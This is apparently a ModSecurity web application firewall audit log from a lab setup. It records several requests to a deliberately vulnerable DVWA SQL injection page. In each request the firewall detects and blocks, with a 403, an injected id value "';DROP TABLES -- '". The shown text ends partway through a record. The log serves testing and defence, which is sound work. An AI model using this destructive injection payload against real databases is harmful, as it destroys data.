{"transaction":{"time":"13/May/2017:12:39:40 --0400","transaction_id":"WRc2zH8AAQEAAAmHBJsAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2zH8AAQEAAAmHBJsAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":428,"p2":2183,"p3":0,"p4":0,"p5":188,"sr":17,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:43 --0400","transaction_id":"WRc2z38AAQEAAAmHBJwAAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2z38AAQEAAAmHBJwAAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":413,"p2":2151,"p3":0,"p4":0,"p5":171,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:45 --0400","transaction_id":"WRc20X8AAQEAAAmHBJ0AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc20X8AAQEAAAmHBJ0AAAAF\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":432,"p2":2376,"p3":0,"p4":0,"p5":206,"sr":16,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:39:47 --0400","transaction_id":"WRc2038AAQEAAAmHBJ4AAAAF","remote_address":"192.168.75.181","remote_port":46618,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=%27%3BDROP+TABLES+--+%27+&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 8 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's;Tnc' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s;Tnc found within ARGS:id: ';DROP TABLES -- ' \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 8)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRc2038AAQEAAAmHBJ4AAAAF\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total 